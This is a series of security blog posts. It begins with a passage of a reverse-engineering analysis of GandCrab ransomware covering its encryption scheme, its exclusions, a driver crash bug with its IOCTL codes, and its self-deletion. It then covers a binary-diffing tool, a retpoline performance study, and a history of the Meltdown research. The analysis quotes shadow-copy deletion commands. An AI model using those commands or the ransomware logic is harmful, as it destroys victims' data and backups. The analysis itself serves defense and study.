Then, for each found network resource of type DISK, the function I called loopFoldersAndEncrypt_wrapper() at 0x00401E47 is executed. For each network resource of type RESOURCEUSAGE_CONTAINER, the currently executed function enumNetworksAndEncrypt() is executed recursively to further enumerate the network resources in the found container at the second half of the function.

The second half of the function does pretty much the same as the first half, the only two differences are that for the enumeration the argument RESOURCE_GLOBALNET is used, in order to enumerate the whole network, and not only the previously used resources, and that the argument argument_NetResource is used in WNetOpenEnumW(), which makes the recursive calls possible.

Note that in the first call to enumNetworksAndEncrypt() the argument_NetResource is zero, which starts the enumeration at the root of the network.

To sum it up:
GandCrab first enumerates up to 128 network disks and encrypts them based on all “remembered (persistent) connections”, according to MSDN. Additionally, GandCrab enumerates and encrypts up to 128 network disks starting at the root of the local network. For each resource container a recursion is made.

Encrypting local drives – Im in ur machine, encrypting ur local drivez

The encryptLocalDriveThread() function at 0x00401D1C is nothing more than a wrapper around the loopFoldersAndEncrypt() function at 0x00405653, and forwards the crypto keys and the root of where the encryption should start. The function loopFoldersAndEncrypt() is not very pretty to look at, so there is no screenshot to describe everything in one picture, but rather several smaller screenshots. The function takes three arguments: The keys need for encryption, the current path where the files and folders are to be iterated and a boolean value, which is used to avoid iterating and encrypting everything in paths containing the string “Program Files” or “Program Files (x86)”, unless the path additionally contains the string “SQL”.

Before starting to recursively iterate over files and folders, GandCrab does some checks on the current path by calling the function at 0x0040512C.

30

The function has two ways of returning a value. An output parameter and the classical ret-instruction with eax. If the current folder contains the string “Program Files” or “Program Files (x86)”, the pointer bProgramFiles_1 is set to “true”, and thus returns the information via an output parameter.

If one of the other folders listed above is found, the function’s return value stored in bRet is set to “true” and returned via eax and a ret-instruction.

Note that GandCrab tries to ensure that the system can still be booted by excluding the folders “Boot” and “Windows”, and tries to ensure you can still pay your ransom by not encrypting the Tor Browser files. It also spares all files installed in “Program Files” or “Program Files (x86)”, unless they contain the string “SQL”, as you can see in the encryption loop later on.

Further on in loopFoldersAndEncrypt() it is then checked if the current path is in one of the special folders. If this is the case and the folder is not in “Program Files” or “Program Files (x86)”, the function returns, thus breaking the recursion and not encrypting the files in the current folder.

In the next step, GandCrab creates the ransom note for the current folder with the hard-coded string KRAB-DECRYPT.txt and the text content which was previously calculated by calling 0x004053FD. In case the ransom note already exists, GandCrab also breaks the recursion by returning.

After that, by calling the function at 0x00405525, a lock file is created by the following algorithm:

31

By mangling the serial number of the drive where Windows is installed with the current day, month and week, as well as some constants, a string is created, which is unique for the current computer at the current day. This string is then used to create a file with the flag FILE_FLAG_DELETE_ON_CLOSE, which keeps the file alive as long as the current file handle is open. The handle is closed after the iteration step in the current folder is finished, thus deleting the file once the current folder and all its sub-folder have been encrypted. In case the file already exists, the recursion loop is broken by returning.

This mechanism is used to synchronize the different threads running in parallel, so that only one thread encrypts the same folder. This means that the file is a marker that a thread is currently recursively running through the current folder.

Note that this only works if GandCrab is not running over midnight, because a change in wDay and wDayOfWeek will change the file name. ¯\_(ツ)_/¯

But, the creation of the ransom note already provides a synchronization token, since it breaks the recursion in case a file with the name of the ransom note is already in the current folder. Additionally, there is another mechanism to avoid encrypting the same file twice later on. 🙂

The actual recursive loop for iterating over files and folders in loopFoldersAndEncrypt() is as simple as it can be:

32

By using the WinAPI FindFirstFileW() (not in screenshot) and FindNextFileW(), GandCrab iterates over the content of the current folder. If a sub-folder is found, the current function calls itself recursively to iterate the sub-folder. For each file that is found, the function encryptFile() at 0x004054B8 is called.

Note that the function behaves differently, if the bSQLfoldersOnly variable is set. This is the case, if the current folder is in “Program Files” or “Program Files (x86)”. If the folder then contains the string “SQL”, the recursion is executed with the third argument set to “true”, which then implicitly always sets the bSQLfoldersOnly to true. This ensures GandCrab does not encrypt anything in “Program Files” or “Program Files (x86)”, unless it has something to do with SQL.

Double check to encrypt only the targeted files

The function I called encryptFile() first does several checks on the current file before it actually encrypts it.

33

First, the current file’s name is copied and extended with the ending “.KRAB”. Then a check on the original file ending of the current file is done. Here the file ending blacklist mentioned before is used to avoid encrypting files with a certain file ending.

Note that “.KRAB” is on that blacklist, so it avoids encrypting a file twice. Additionally, to keep the system running and bootable, no executables, DLLs, drivers, etc. are encrypted.

Then, by calling bIsFilenameOnBlacklist, GandCrab checks if the current file is one of a hard-coded list of filenames.

34

This once again ensures that the system stays bootable – you should be able to pay your ransom after all. But since GandCrab does not want to blacklist those files by their extension, because there could be user files with those extensions, GandCrab decided to exclude only a few specific files from encryption.

If the file name is ok and the file has at least two Bytes, the encryption is started by calling encryptionFunc() at 0x00401AA7. After the encryption, the file is renamed into the file name with the .KRAB ending by calling MoveFileW().

The actual encryption

The actual encryption of each file takes place in encryptionFunc(). There are two function arguments. The first is the path to the file to be encrypted and the second one is a pointer to a structure I called cryptKeys and is defined as follows:

struct cryptKeys
{
void* pubkey;
void* privkey;
void* privkeySize;
void* pubkeySize;
keypairBuffer *keypairBuffer;
};

Although the struct has several different members, only the pubkey and the pubkeySize are used here (remember that the private key buffer has already been freed at this point).

For each file to be encrypted, a function call to 0x004019F8 creates a new random IV of 8 bytes and a symmetric key for the Salsa20 algorithm of 32 bytes (not in screenshot). Those two random values are then encrypted with the previously created RSA public key and stored in the structure I called encryptionInfoBlob in the following screenshot.

35

GandCrab is reading the file in chunks of 1 MB, then adds the number of read bytes to the encryptionInfoBlob structure, encrypts the 1 MB blob, moves the file pointer back by 1 MB and writes 1 MB of encrypted data. In case less than 1 MB was read, the sizes are adapted accordingly and the loop finishes.

Once the whole file is encrypted, GandCrab adds the encryptionInfoBlob structure to the end of the file.

The structure looks like this:

struct encryptionInfoBlob
{
byte encryptedSymkey[0x100];
byte encryptedIV[0x100];
LARGE_INTEGER encryptedBytes;
}

So, each file is fully encrypted in chunks of 1 MB with Salsa20, no matter how big the file is. For each file a new Salsa20 key and IV are randomly created and then stored at the end of the file after they are encrypted with the RSA public key, which was newly created during the run of GandCrab. Additionally, the number of encrypted bytes is also added at the end of each file.

deleteShadowCopies

Once all encryption threads are finished, the control flow goes way back to the mainFunction(). Here GandCrab deletes the shadow copies of the system to ensure a victim cannot simply restore his/her files.

On Windows Vista or later GandCrab executes “wmic.exe” with the parameter “shadowcopy delete”. On Windows XP it calls “cmd.exe” with the parameter “vssadmin delete shadows /all /quiet” via ShellExecuteW().

Before returning from the mainFunction() to the main(), GandCrab waits for the previously spawned network thread, which is trying to contact the C&C to finish by calling WaitForSingleObject().

Ransomware with a kernel driver “exploit”

Back in main(), GandCrab calls the function I called AntiStealth() at 0x00401270. The backstory of this function seems to be a somewhat personal feud between the author(s) of GandCrab and the security vendor Ahnlab, who released a “vaccine” against GandCrab. The details can be read here https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-author-bitter-after-security-vendor-releases-vaccine-app/

Previously, when analyzing the gathering of the system information during the MainFunction(), you could see an unused string taunting Ahnlab once again, saying there was a “full write-what-where condition with privelege escalation”, even providing a download link for an exploit proof of concept.

In the blog post mentioned above, the alleged GandCrab author states that the “exploit will be an reputation hole for ahnlab for years”. Well see about that. 🙂

First, the AntiStealth() function parses the time stamp in the PE header of “%windir%\\system32\\ntoskrnl.exe” and saves it for later.
Second, the device with the path “\\.\AntiStealth_V3LITE30F” is opened by calling CreateFileW(). Note that this is the first bug in the driver: It does not set its access rights correctly, if a random process without admin privileges can open a private kernel device.

Then three heap buffers with R/W access rights are allocated by calling VirtualAlloc(), the first two of size 0x200, the third of size 0x10.

After that, GandCrab checks if it is running as Wow64 process and if so, it uses the Heavens Gate technique to call x64 functions of ntdll. On x64 it uses NtDeviceIoControlFile() on x86 simply DeviceIoControl() to communicate with the kernel device.

The actual “exploit” can fit into a single screenshot:

36

First the IOCTL 0x82000010 is sent with the input buffer as seen above. Then a second IOCTL 0x8200001E is sent, which makes your system bluescreen if everything goes according to plan.

The exploit is also mentioned by https://www.fortinet.com/blog/threat-research/a-chronology-of-gandcrab-v4-x.html. In this blogpost Fortinet states that they “were able to confirm this on Ahnlab V3 Lite 3.3.46.1 with TSFltDrv.sys file version 9.6.0.5“. However, that is not correct:

The two IOCTL are not handled in TSFltDrv.sys, but in a driver called TfFRegNt.sys, of which I analyzed version 4.6.0.1 with the Sha256 2B07F2CA6FC566EF260D12B316249EEEBA45E6C853E5A9724149DCBEEF136839.

In its x86 variant the driver has 275 functions, as identified by IDA and exposes at least a file system minifilter driver functionality.

The function which handles the IOCTLs is placed at 0x0040921C, and it handles the IOCTL used in the exploit like this:

37

Parsing the user buffer is done like this:

38

First, a check on the value I called bExInitializeResourceLiteSucceeded is executed. It marks that during initialization of the driver a call to the WinAPI ExInitializeResourceLite() was successful.

Then, by accessing the global variable I called kernelBase, which stores a copy of ntoskrnl.exe, which is read during initialization, and by executing the function getNtoskrnTimeStamplDword() at 0x0040318E, the time stamp in the PE header of ntoskrnl.exe is extracted.

If the second DWORD of the buffer from user space is the correct time stamp, the global variable I called userBufferFirstDWORD is set to the first DWORD in the user buffer.

Comparing this functionality with GandCrab’s code, the variable userBufferFirstDWORD is now set to 0xDEADBEEF.

The second IOCTL is handled like this:

39

At first, the user buffer is interpreted as a structure, which I called userObj. It has, besides other unimportant members, a length and a “buf”. With this information, several size and sanity checks are executed to ensure that the userObj does not exceed 0xff bytes in size. With the following function call to checkBufferRanges() at 0x0040912E, the driver ensures that userObj is within the user provided buffer.

40

Afterwards, the driver calls handleUserBuffer() at 0x00408F76 in order to process the user input.

41

The first two function calls map the MDL address of the IRP to a virtual address and then deserialize a string from the user buffer into a custom object which I called memObj. The memObj, as well as the mapped memory of the MDL and the second element of the userObj are then passed to another function which I called thisWayGoesToCrash() at 0x004052EA.

42

The first function call to findObjectInList() at 0x00406996 looks up a file handle by iterating over a driver internal linked list, comparing the list objects based on the user input. If some object is found, the function ExAcquireResourceSharedLite_onUserBuffer() at 0x0040606A is called:

43

You might notice that the first argument of ExAcquireResourceSharedLite() is userBufferFirstDWORD, the very same buffer which was set with the first IOCTL.

When the function call ExAcquireResourceSharedLite() is execute, Windows bluescreens. The crash dump analysis of Windbg looks like this:

44

Note that the first argument is 0xDEADBF23, which is similar to the address 0xDEADBEEF, which was the first argument of ExAcquireResourceSharedLite().

Looking at the function in Ntoskrnl to see where the crash actually happened, we can see this code:

45

The red marked area is where the crash happened. You can see a few lines above, that ecx got loaded by the instruction “lea ecx, [edi+34h]”, while edi was holding the first function argument. So 0xDEADBEEF + 0x34 = 0xDEADBF23, which is the memory referenced, which caused the crash.

So, what is happening in Ahnlab’s driver?

With the first IOCTL, you can give the kernel driver a pointer to an object which the kernel driver expects to be a ERESOURCE pointer. With the second IOCTL, the driver tries to acquire the resource object, and thus crashes.

Is this really a “full write-what-where condition with privelege escalation” as the GandCrab authors state? In my humble opinion, no. There is no fully controllable write primitive and the exploit does not show any privilege escalation.

You can specify an arbitrary memory location on which the WinAPI ExAcquireResourceSharedLite() gets executed. So, whatever the API does with the ERESOURCE object, you can do to an arbitrary memory location.

In theory, a very skilled attacker might be able to use this to manipulate a memory address as one gadget. But without any further gadgets, it is very hard to create some kind of real working exploit out of this.

So, I would say this is rather a denial of service bug, than a full write-what-where privilege escalation security issue.

Covering its tracks

In case the driver bug did not bluescreen the system, GandCrab tries to delete itself by calling the function deleteSelfWithTimeout() at 0x004032CE.

46

It opens a new command line process, which first calls “timeout -c 5” and then deletes the current file from which GandCrab was started. After the command line process has been started, GandCrab ends its process by calling ExitProcess().

The intention of the timeout is most probably to give the current process enough time to end itself, before the newly started command line tries to delete it. It is funny to note that the command “timeout” has no switch “-c”. I could not make the timeout work with “-c” on Windows XP, 7, 8 or 10. ¯\_(ツ)_/¯

Nonetheless, in all my tests the start of the new process took a few milliseconds longer than exiting the GandCrab process, which is why the deletion always worked, although it is very racy.

Conclusion

When analyzing GandCrab, I was fascinated by the simplicity of the malware in comparison to its efficacy. This malware does on point what it aims to do: Encrypt as much files as possible as fast as possible with a strong encryption algorithm.
There is not too much unnecessary code, e.g there is no persistency to survive reboots.

One oddity that sticks out is the kernel driver exploit, which is probably intended to show off the GandCrab author(s) skills in order to gain a big media echo, which is important to support GandCrab‘s affiliate model.

One framework to build them all, one framework to name them, and in their IDBs to bind them

Authors: Luca Ebach, Tilman Frosch

Rejoice everyone, today we pushed bindifflib to our Github! Bindifflib is a framework to build a set of libraries with a set of different compilers, currently the compilers of Visual Studio 2010, 2013, 2015, and 2017 – both 32 bit and 64 bit. After compilation, bindifflib will import all DLLs into IDA Pro and will use the Program Database (PDB) files to properly name (almost) all functions in the IDB.

We have created bindifflib out of the need speed up our understanding of binary code dropped at our doorstep, mostly malware. Occasionally, we encounter larger binaries that smell of statically linked libraries. Figuring out which part of the binary is a library, which library specifically, and which part is actually relevant, often takes some time that could be spent better and is also not very exciting. Fortunately there is BinDiff! Having some functions already identified allows us to spend the time to understand the purpose of the code and the authors‘ intentions instead of first digging through the basic capabilities as provided by knowing that a certain library was used in general. So let‘s just create some targets to diff a unknown binary against, so that we can focus our reversing efforts on the non-generic parts of the binary. Having just one library compiled by one compiler didn’t really cut it, so it was time to automate things to have a selection of likely or frequently used libraries compiled with a set of popular compilers. Naturally, one could also replace „likely“ and „frequently“ by „vulnerable“ and head into a completely different direction that bindifflib can help with.

We consider the code more a proof of concept than a software product. Use at your own risk, we love feedback!

Find the code here: https://github.com/GDATAAdvancedAnalytics/bindifflib

In debt to Retpoline

 

Appendix was added on the 14th of Febuary 2018, in response to comments made to me on twitter. In this connection “retpoline pause lfence” and “retpoline ud2” was added to the table. Other than that only typos where fixed since original post.

Abstract

In this blog post I explore the Retpoline mitigation that Paul Turner of Google suggested for the Spectre indirect branch variant issue [1]. A short differential side channel analysis is made along with a performance analysis. The impact of the use of a pause instruction in retpoline is discussed. Finally I consider the technical debt leveraged on CPU developers of a widely deployed retpoline.

 

How does retpoline work

This section follows the google presentation of retpoline closely [1]. I included it because it provides the context for the remainder of this blog post. A jmp rax is turned into the following code:

 

  1. call set_up_target;  
  2. capture_spec:     
  3. pause;                  
  4. jmp capture_spec
  5. set_up_target:  
  6. mov [rsp],rax   
  7. ret;          

call set_up_target (1) pushes the address of capture_spec(2) to the return stack buffer (RSB, cpu internal buffer used to predict returns). It also pushes the address of capture_spec(2) to the program stack and transfers control to set_up_target (5).  The mov [rsp],rax overwrites the return stack address on the program stack, so that any subsequent returns will pop the stack and return to the original target in its architectural path. The speculative path of the return remains the value from the RSB and thus the CPU will speculatively execute the code starting at (2). The pause instruction is meant to relinquish pipeline resources to co-located hyperthreads and save power if no co-located hyperthreads are present. The jmp in line 4 continues to repeat the pause until the speculative execution is rolled back when the ret in line 7 finished executing.

 

In simple terms this means the speculative path will resolve to a spinlock thus not leak any information through a side channel. The architectural path will eventually resolve correctly and the program will run as it is supposed to.

 

Side channel analysis of retpoline

Retpoline’s architectural side channels consist of flushing an entry in the RSB caused by the call in line (1). This information is unlikely to bring an attacker much advantage and would require an attack to have a sufficient amount of control of the RSB. The 6th line makes a store access on the stack. This is visible through a cache side channel to an attacker — provided the attack has sufficient control. However, it is unlikely to provide much information given that the stack is usually used by the functions themselves. It is worth noting that any information this side channel can provide is also provided by the jmp rax (6). Presumably retpoline’s stack access provides slightly less information to an attacker than the original jmp rax instruction – i.e. BTB indexing bits vs. cache set indexing bits. The 7th line is more tricky: if the CPU updates the BTB after a misprediction, the BTB side channel will be similar useful to the original jmp rax. I think it is likely that the BTB is not updated until retirement, so that this side channel isn’t present. Since the pause instruction (line 3) is a CPU hint, the CPU may choose to take or ignore the hint at its discretion – more on this below. Thus, pause may or may not provide a side channel.  If external power is plugged in and the hint is taken one can see a co-located hyperthread speed up (see [2]), which is the purpose of having the pause instruction here, but certainly a side channel as well. If the CPU is running in power saving mode (e.g. unplugged laptop), pausing provides a side channel since executing a pause instruction on two co-located hardware threads causes a delay for both, presumably through C-State interaction. See[3]. In sum, I think the side channels provided by retpoline is less valuable than the side channel provided by the original indirect branch (but is still present).

 

Performance analysis of retpoline

A jmp rax instruction takes about 4 clock cycles to execute and predicts correctly very often. It is replaced in retpoline with a ret instruction which will always mispredict and thus executes far slower. However, unlike doing hard serialization once the ret instruction has been executed out-of-order, the CPU seems to be able to continue without a pipeline flush and thus allowing out-of-order execution to continue. This creates two corner cases: firstly, where dependencies block out-of-order execution across the indirect branch, and secondly, when there is no dependence across the indirect branch. I managed to create a sequence of instructions where retpoline was just as fast as the original unpredicted branch – this is the case when the instructions after the branch depend on the results of the instructions before the branch. Obviously, any co-located hyperthread will be more affected by the retpoline than a predicted indirect branch, but the thread itself does not lose any cycles. At first this seems weird, but imagine completely dependant ALU integer instructions on both sides of the indirect branch – with the branch unit being completely free, both retpoline and the indirect branch will execute concurrently with the integer ALU instructions before the branch. Since the integer ALU instructions after the branch are dependant of those before the branch, they only get scheduled for execution once all prior instructions have been executed. Thus, retpoline and an indirect branch perform equally. In the case of no dependencies across the indirect branch, retpoline is slower. Retpoline will not allow the out-of-order execution to continue until the ret instruction is executed and consequently adding a penalty compared to a predicted indirect branch. In general, the longer it takes for the indirect branch to resolve, the higher the penalty of retpoline is. There is also an indirect performance cost of retpoline which – in my opinion – is likely to be somewhat smaller. The call in line 1 will push a return address onto the RSB (and consequently may evict the oldest entry in the RSB), and thus potentially causing an RSB underflow once a previous call returns. A RSB underflow will manifest itself as a negative performance impact if the evicted RSB entry causes mispredictions or stalls in unrelated code later on. For this to happen a call stack is required to be deeper than the the size of the RSB. The stall penalty of the underflow was big enough to cause Intel to add prediction to the microarchitecture (for Broadwell and Skylake). If this prediction was as efficient as using the RSB, the RSB would not exist.

 

The following table presents the results of my micro benchmarking:

 

Unit Clock cycles Mean Std.dev Median
jmp rsi 350.33 95.48 346
retpoline pause 410.64 65,94 410
retpoline lfence 403.76 25,96 404
retpoline clean 402.13 19,99 402
retpoline pause lfence 406.74 64,76 404
retpoline ud2 404,29 28,70 402

The “retpoline clean” is without the pause instruction, “retpoline lfence” is where pause has been replaced with a lfence instruction. The results are generally not very stable over multiple runs but with all three versions of retpoline often ending up with an average of around 400-410 cycles and the indirect branch being around 50 clks faster on average. Thus, some additional care should be taken before concluding

 that “retpoline pause” is slower than the others. I ran the tests with 100k observations and removed the slowest 10% observations in a primitive noise reduction approach. The microbenchmark is for a bad case with no dependency across the indirect branch for integer instructions (add rsi,1, add rbx, 1 respectively) and is run on a Intel  i7-6700k. While microbenchmarking is important for the arguments I will put forth in this text, it is important to note that they are not reflective on the system’s performance as the incidence of indirect branches is relatively small and this benchmark is manufactured to portrait cases which are worse than in normal scenarios. Also, the microbenchmarking completely ignores any indirect effects.

The weird case of pause

It immediately seemed weird to me to have the pause instruction in the spinlock in line 3 of retpoline. Usually we have pause instructions in spinlocks, but spinlocks execute architecturally at some point. Having a pause of 10 clock cycles for Broadwell and 100 for Skylake in the spinlock potentially causes the CPU to pause the architectural flow that needs to be done before the return instruction can be executed. This may lead to a larger-than-necessary penalty to the spinlock. However, pause is not actually an instruction. It is a hint to the CPU and my guess is that the hint is not taken. I ran retpoline on my Broadwell and my Skylake and compared the penalty: there was almost no difference. This is important because we would expect the different implementation of pause to give different average latencies if it was actually executed (10 clk vs 100 clk). Another argument for pause not being executed speculatively is that pausing is connected to a VmExit. I can only guess why Intel  made it is possible to get a VmExit on pause instruction. I think the most compelling reason would be to use the pause used by spinlock in a guest to process small work items in the hypervisor instead of just idling the CPU. This would probably also help virtualizing hardware. If I am right about this, it would be sensible for the pause hint actually pause only on retirement instead of pausing the CPU speculatively. Another argument is power management: the behavior of the pause instruction depends on the C-State of a co-located hyperthread. Presumably this gives us one of the two side channels as described in a previous section. There is little reason on why a CPU designer would pause a thread which is executing other instructions out-of-order.

 

Discussion of technical debt of retpoline

As clever as retpoline seems, I think it is fundamentally broken. Not because it does not work but instead because it builds a large amount of technical debt. Adding retpoline to a piece of software would require CPU designers to make sure that legacy software is compatible with new CPUs. If a company like Google applies retpoline in their instructure it is fairly unproblematic, Google has a nice inventory of software running on their systems and they can make sure that software applied to new CPUs is recompiled and consequently this poses no constraints on a CPU designer. However, if we add retpoline to a compiler we can be sure it will be added to all kinds of software including virtual machines, containers, specialized software etc. These pieces of software often do not remain supported, they are poorly catalogued and consequently, if the behavior of retpoline changes significantly, these systems may perform suboptimal, be unsafe or even completely break. This effectively ties the hands of CPU designers as they strive to improve the CPU in the future.

 

The first concrete problem I see is the use of the pause hint: regardless of whether the pause hint is taken in retpoline or not, its non-intended use in retpoline ties the behavior of this instruction down for CPU designers in future generations of CPUs. It is worth noting here that we have at least 3 different implementations of the pause hint in different CPUs already (treated as nop, stall 10 clks, stall 100 clks)[5]. Adding to that the complexity of the instruction I outlined above, it would be fair to assume that this instruction might need changes in future generations of CPUs. Thus, having the pause hint in retpoline in scattered over software everywhere might turn out to be a bad idea thinking long term. The good news here is that there probably is a good solution for this. Replacing the pause instruction with lfence will serialize the speculative path and probably even stop it from looping; effectively stopping the execution of the spinlock may free up resources for co-located hyperthread as well as branch execution units for the main thread that otherwise would have been tied up by the jmp instruction in line 4. I ran some test on Skylake and found very near identical performance results for pause and lfence, suggesting that this is viable solution. It is important to note that the lfence instruction was previously documented to only serialize loads. But instead it silently serialized all instructions — which is now the documented behavior since Intel published their errata documents for the Spectre/Meltdown patches [7]. So, the mortgage on lfence is small and has already been signed.

 

The second concrete problem I see is the construct which repoline uses to direct speculative execution into the spinlock is a much bigger problem. On Skylake, return instructions predict by using the indirect branch predictor, requiring Skylake to be handled differently than other CPUs. The problem is twofold: on the one hand, the very common ret instruction needs to be replaced with retpoline (or other non-speculative branching), and on the other hand, the hardware interrupt raised in line 6 may underflow the RSB in the interrupt handler. Thus, repoline is already potentially unsafe on some CPUs (in my opinion much less than without retpolinie though). The technical debt here is that retpoline may be completely unsafe if future CPUs stop relying on the RSB for return prediction. There may be many reasons for a CPU designer to change this. For example a completely unified system for indirect branches or prediction of monotonic returns (returns with only one return address). The latter will keep the RSB save from non-monotonic returns if the RSB underflows and thus may perform better when there are deep call stacks. I do not know whether these things are good ideas, but retpoline might effectively rule them out. Also, one could imagine conflicts with future CPU-based control-flow integrity systems, etc.

 

One could argue that performance optimization rely on microarchitecture details all the time, but there is an important difference between breaking a performance optimization and a security patch. Already we see problems with updating broken libraries amongst software vendors, it’s not difficult to imagine what would happen if a secure software becomes insecure because of CPU evolution.

 

Instead of taking on technical debt potentially forever, I suggest we use either a less secure option (i.e. lfence ahead of indirect branches) or a more expensive option such as IPBP [7] or replacing indirect calls with iret (which is documented to be serializing). That constitutes a high price now, but avoids paying rent on technical debts in perpetuity.

 

Conclusion

Retpoline is an effective mitigation for Spectre variants which rely on causing misprediction on indirect branches on some CPUs. From a pure side channel perspective retpoline adds a different side channel but it is an improvement over the side channel of a traditional indirect branch nonetheless. Retpoline’s performance penalty is complex, but likely smaller than the penalty of the serializing alternatives. However, as Retpoline relies on assumptions about the underlying microarchitecture, it adds technical debt if used widely. If Google, Microsoft or whoever with software-deployment management wants to use it, they have my blessing but there is reasons for scepticism if it is a good idea to have it in general purpose compilers. CPU Vendor’s short term marketing deficits should not lead us to trade small short term performance gains causing technical debt to be paid back with interest in the future for a more complex microarchitecture.

Appendix added 14th of Febuary 2018

Stephen Checkoway of University of Illinois at Chicago commented that it might be worth testing an ud2 instruction in the speculative executed spinlock. I find this idea promising because ud2 essentially just throws an “invalid opcode” exception and thus abusing it for retpoline is likely to produce equivalent performance to that of lfence, perhaps even better, Further, it’s unlikely that using this instruction is associated with any technical debt. The simple test result here shows that the direct performance impact is approximately similar (see table above) that of the other versions of the spinlock.

Some implemented versions of retpoline uses a pause followed by an lfence instruction. I added this to the performance table as well. Thanks to Khun Selom & @ed_maste (twitter account).

 

 

Literature

[1] Turner, Paul. “Retpoline”. https://support.google.com/faqs/answer/7625886

[2] Fogh, Anders. “Two covert channels”. https://cyber.wtf/2016/08/01/two-covert-channels/

[3] Fogh, Anders “Covert Shotgun”. https://cyber.wtf/2016/09/27/covert-shotgun/

[4]Intel, “Intel® 64 and IA-32 Architectures Software Developer Manual: Vol 3”

.https://www.intel.com/content/www/us/en/architecture-and-technology/64-ia-32-architectures-software-developer-system-programming-manual-325384.html

[5] Intel. Intel® 64 and IA-32 Architectures Optimization Reference Manual. July 2017. https://software.intel.com/sites/default/files/managed/9e/bc/64-ia-32-architectures-optimization-manual.pdf

[6] Evtyushkin, Dmitry, Dmitry Ponomarev, and Nael Abu-Ghazaleh. “Jump over ASLR: Attacking branch predictors to bypass ASLR.” Microarchitecture (MICRO), 2016 49th Annual IEEE/ACM International Symposium on. IEEE, 2016.

[7] Intel, “Speculative Execution and Indirect Branch Prediction Side Channel Analysis Method”, https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00088&languageid=en-fr

Behind the scenes of a bug collision

Introduction

In this blog post I’ll speculate as to how we ended up with multiple researchers arriving at the same vulnerabilities in modern CPU’s concurrently. The conclusion is that the bug was ripe because of a years long build up of knowledge about CPU security, carried out by many research groups. I’ll also detail the rough story behind the research that let me to the bug. My story is probably different than that of the other researchers, but while unique, I am relatively sure that it’s the same for all researchers on most security issues: security research is a long haul thing. The remainder of this blog post is semi-technical.

Why did we get a bug collision on Spectre/Meltdown?

This is of course my take on the event, my personal story, which I’ll detail below. Research collision in CPU research isn’t that uncommon. In fact, the story of my friendship with Daniel Gruss is about a series of collisions. In 2015 I was preparing a talk about row hammer for Black Hat with Nishat Herath [2] when Daniel tweeted that he was able to flip bits from Javascript. I didn’t want to have questions I couldn’t answer, so I started researching it and literally the evening before Daniel published how he was doing it, I knew how he did it. Later Daniel teased me about detecting cache side channels if there were no L3 cache misses. I replied ‘are you timing Clflush?’ He was indeed. You’ll find me being acknowledged in the paper for this reason [1]. I told him he shouldn’t worry about me competing on publishing it, because I was doing research on a side channel in the row buffer and didn’t have time to compete on Clflush. Turns out he and the wu cache clan were too. I blogged it, and wu cache clan wrote a paper on it in Pessl et al. [3]. You’ll find me acknowledged here as well. Not long after that, I did a blog post on breaking KASLR with the prefetch instruction. Obviously, Daniel was doing the exact same thing again. We had enough of competition and started my by now a regular collaboration with the WU cache clan after that point.

So why do things like this happen? (Granted, the story about Daniel is a freaky one.) Well, CPU research is much like drawing a map of an uncharted world. Researchers start from known research and proceed into the unknown, and if they find something, they document it and add it to the map. This essentially means that the frontier looks very similar to everybody leading people into the same paths. This processed is very much sustained by the fact that almost all research in this area is academic and academia is much better organized in terms of recording and documenting than hackers.

For a thing like meltdown, the real foundation was laid with the work on cache side channels sometime back around 2005. There are many papers from this time, I’ll mention Percival [4] because it’s my favorite. Another milestone paper was Yuval Yarom’s paper on Flush+reload [5]. Note that Yuval is also partial to the Spectre paper. With this foundation, a subgenre of papers emerged in 2013 with Hund, Willems & Holz [6]. They essentially noticed that when an unprivileged user tries to read kernel mode memory, the CPU actually does a great part of the read process before making an error, allowing a user to observe not the data of the kernel, but the layout of the kernel – this is known as a KASLR break and is important for classical exploits. This work was followed up with improvements including Gruss et al [7] and Yang et al [8]. Both papers showed that a lot more work was being done by the CPU than was strictly needed when an unprivileged user accesses kernel memory – an important prerequisite for Meltdown to exist. Also in 2016, another KASLR break using branches from Evtuishkin et al. emerged[9]. They didn’t try to read from the kernel but rather found that branch prediction leaked information. This is important because branch prediction is a precursor for speculative execution and thus build a bridge towards Meltdown. Felix Wilhelm [11] extended Evtuishkin et al. [9] to extend to hypervisors which are likely to be important in the rationale for hypervisors being affected. In fact, I think Jann Horn mentioned this blog post as an inspiration. There where other works, like that of Enrique Nissim[11] which showed that the KASLR breaks real-world applications with a classic exploit. Also in 2016, some work was being done on side channels in the pipeline. My Covert Shotgun blog post is an example of this literature[12]. To sum it up, by the end of 2016 it was known that unprivileged reads from user mode to kernel mode did more processing than was strictly required, it was known that branches were important, and there was work going on examining the pipeline. In end effect, the Meltdown bug was surrounded on all sides. It was a single blind spot on the map – obviously, nobody knew that there’d actually be a bug in this blind spot and I think most did not believe such as bug existed. Other people would probably pick other papers and there where many. My point remains: a lot of people moved towards this find over a very long period of time.

The personal perspective
I work for GDATA Advanced Analytics and there I work in an environment that is very friendly and supportive of research. Without research, a consultant company like ours cannot provide excellence for their customers. However, CPU bugs don’t pay the bills, so my day job does not have much to do with this. I spend my time helping customers with their security problems: malware analysis, digital forensics, and incident response being the main tasks that I do on a day to day basis. This means that the bulk of the work I do on CPUs is done in my spare time after hours.

So my story with Meltdown and Spectre starts essentially at Black Hat 2016 where Daniel Gruss and I presented our work on the prefetch instruction. The video of our talk can be found here [13]. As described above, this work slowly gave me this fuzzy feeling that maybe this work is just the tip of the iceberg. In fact did a blog post about the meta’s on breaking KASLR in October 2016 [14] and presented it at RuhrSec 2017 [15], so I was very well acquainted with that literature. Meanwhile, I wanted to get away from working with caches and accidentally found some covert channels and wrote about them[16]. I thought there might be more and started picking apart the pipeline in search of covert channels. My frustration led me to automate finding covert channels which resulted in this blog post [12] and later this talk at HackPra [17]. In the talk, you can hear that I’m still frustrated “I don’t care, I’ll just use a shotgun”. To this day I have many unanswered questions about the pipeline..
Later that year I met up with the WU Cache Clan at CCS where we were presenting the academic version of the prefetch KASLR break[7]. We had some beer-fueled conversations. The conversations were added upon at Black Hat Europe (Michael Schwarz and I did a talk on the row buffer side channel we’d done concurrent work on) where I started believing that meltdown might be possible, but yet without a clue as to how it could possibly work.

